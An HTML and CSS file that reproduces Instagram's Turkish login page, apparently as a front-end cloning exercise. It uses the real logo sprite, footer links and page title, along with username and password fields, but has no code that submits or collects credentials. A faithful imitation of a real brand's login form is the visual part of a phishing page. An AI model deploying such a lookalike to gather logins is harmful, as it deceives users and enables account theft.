<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=, initial-scale=1.0">
    <link rel="icon" type="image/x-icon" href="instagram.png">
    <script src="https://kit.fontawesome.com/bb1f7cfb80.js" crossorigin="anonymous"></script>
    <style>
        body {
  font-family: sans-serif;
  background-color: #fafafa;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
    Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
  box-sizing: border-box;
}

a {
  text-decoration: none;
}

.container {
  max-width: 1000px;
  margin: 0 auto;
  display: flex;
  justify-content: center;
  flex-direction: column;
  align-items: center;
  margin-top: 120px;
  font-size: 14px;
  width: 350px;
  height: 580px;
}

.box1 {
  max-width: 350px;
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
  background-color: #ffff;
  border: 1px solid #e6e6e6;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  flex-grow: 1;
}
.box3 {
  max-width: 350px;
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
  background-color: #ffff;
  border: 1px solid #e6e6e6;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  flex-grow: 1;
}
.box2 {
  max-width: 350px;
  width: 100%;
  display: flex;
  justify-content: center;
  align-items: center;
  flex-direction: column;
  background-color: #ffff;
  border: 1px solid #e6e6e6;
  border-radius: 1px;
  margin: 0 0 10px;
  padding: 10px 0;
  flex-grow: 1;
}


.heading {
  margin: 22px auto 12px;
  background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
  background-position: -98px 0;
  height: 51px;
  width: 177px;
  overflow: hidden;
}

.field {
  margin: 10px 0;
  position: relative;
  font-size: 14px;
  width: 100%;
  text-overflow: ellipsis;
}

input {
  padding: 9px 0px 7px 9px;
  font-size: 12px;
  width: 16rem;
  height: 1.2rem;
  outline: none;
  background: #fafafa;
  border-radius: 3px;
  border: 1px solid #efefef;
}

/* label intial position*/

label {
  position: absolute;
  pointer-events: none;
  left: 10px;
  padding-bottom: 15px;
  transform: translateY(10px);
  line-height: 6px;
  transition: all ease-out 0.1s;
  font-size: 12px;
  color: #999;
  padding-top: 6px;
}

/* hiding placeholder in all browsers */

input::placeholder {
  visibility: hidden;
}

/* hiding  placeholder in mozilla */
.login-form ::-moz-placeholder {
  color: transparent;
}

/* label final position */
input:not(:placeholder-shown) + label {
  transform: translateY(0);
  font-size: 11px;
}

/* input padding increases if placeholder is not shown */
input:not(:placeholder-shown) {
  padding-top: 14px;
  padding-bottom: 2px;
}

.login-button {
  text-align: center;
  width: 100%;
  padding: 0.5rem;
  border: 1px solid transparent;
  background-color: #3897f0;
  color: #fff;
  font-weight: 600;
  font-size: 14px;
  cursor: pointer;
  border-radius: 7px;
  height: 32px;
}

.separator {
  display: flex;
  justify-content: space-between;
  align-items: center;
  color: #999;
  margin-top: 6px;
}

.separator .line {
  height: 1px;
  width: 40%;
  background-color: #dbdbdb;
}

.other {
  display: flex;
  justify-content: center;
  flex-direction: column;
  align-items: center;
}

.fb-login-btn {
  margin: 1rem;
  border: 0;
  cursor: pointer;
  font-size: 14px;
  color: #385185;
  font-weight: 600;
  background: transparent;
}

.fb-icon {
  color: #385185;
  font-size: 1rem;
  padding-right: 1px;
}

.forgot-password {
  font-size: 11px;
  color: #003569;
}

.signup {
  color: #3897f0;
  font-weight: 600;
}

.download-app{
    padding: 15px;
    text-align: center;
}
.google-play-image{
  height: 40px;
  width: 132px;
}
.microsoft-image{
  height: 40px;
  width: 110px;
  padding-left: 5px;
}
.footer{
    color: #9893A0;
    font-size: 12px;
    padding-top: 150px;
    padding-left: 26%;
}
.footer-first a{
    color: #9893A0;
    font-size: 12px;
    padding-left: 14px;
}
.footer-second{
    color: #9893A0;
    font-size: 13px;
    display: flex;
    flex-direction: row;
    padding-top:15px;
    text-align: center;
    padding-left: 28%;
    padding-top: 20px;
}

    </style>
    <title>Giriş Yap • Instagram</title>
</head>
<body>
    <div class="container">
        <div class="box1">
            <div class="heading"></div>
            <form class="login-form">
                <div class="field">
                    <input id="username" type="name" placeholder="Telefon numarası,kullanıcı adı veya e-posta" style="font-weight: 1px;" />
                    <label for="username">Telefon numarası,kullanıcı adı veya e-posta</label>
                </div>
                <div class="field">
                    <input id="password" type="password" placeholder="Şifre" />
                    <label for="password">Şifre</label>
                </div>
                <button class="login-button" title="login">Giriş yap</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>YA DA</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <i class="fa fa-facebook-official fb-icon"></i>
                        <span class="">Facebook ile Giriş Yap</span>
                    </button>
                    <a class="forgot-password" href="#">Şifreni mi unuttun?</a>
                </div>


            </form>
        </div>
        <div class="box2">
            <p>Hesabın yok mu?<a class="signup" href="#">Kaydol</a></p>
        </div>
        <div class="download-footer">
            <div class="download-app">
                <span class="download-app-span">Uygulamayı İndir</span>
            </div>
            <div>
                <img class="google-play-image" src="https://static.cdninstagram.com/rsrc.php/v3/yp/r/XUCupIzGmzB.png" alt="">
                <img class="microsoft-image" src="https://static.cdninstagram.com/rsrc.php/v3/yf/r/BFthdeAc5KC.png" alt="">
            </div>
        </div>
    </div>
    <div class="footer">
        <div class="footer-first">
        <a href="https://about.meta.com/">Meta</a>
        <a href="https://about.instagram.com/">Hakkında</a>
        <a href="https://about.instagram.com/blog/">Blog</a>
        <a href="https://www.instagram.com/about/jobs/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">İş Fırsatları</a>
        <a href="https://help.instagram.com/">Yardım</a>
        <a href="https://developers.facebook.com/docs/instagram">API</a>
        <a href="https://www.instagram.com/legal/privacy/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">Gizlilik</a>
        <a href="https://www.instagram.com/legal/terms/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">Koşullar</a>
        <a href="https://www.instagram.com/directory/profiles/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">Başlıca Hesaplar</a>
        <a href="https://www.instagram.com/explore/locations/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">Konumlar</a>
        <a href="https://www.instagram.com/web/lite/?next=https%3A%2F%2Fwww.instagram.com%2Flogin%2F%3F__coig_login%3D1">Instagram Lite</a>
        <a href="https://l.instagram.com/?u=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Finstagram%2F261704639352628%3Fnext%3Dhttps%253A%252F%252Fwww.instagram.com%252Flogin%252F%253F__coig_login%253D1&e=AT30dXUocAh35gfD4IijHN7yZzulP5CBOsg5qRiAa39VnJs85cgjf1Bpd1hFdp4ymRnO748DpejfHrU_0ovuPQeXZhWujAaqCjXITVqzGbaQWXP_U43QN1i5vqes0SJdSr6wZYQhq8K39ebnMSqvI6SU_tbp1YOboU6eiQ">Kişi Yükleme ve Hesabı Olmayan Kişiler</a>
        </div>
        <div class="footer-second">
        <i class="fa-regular fa-copyright"></i>
        <span>2023 Instagram Meta</span>

        </div>
    </div>
</body>
</html>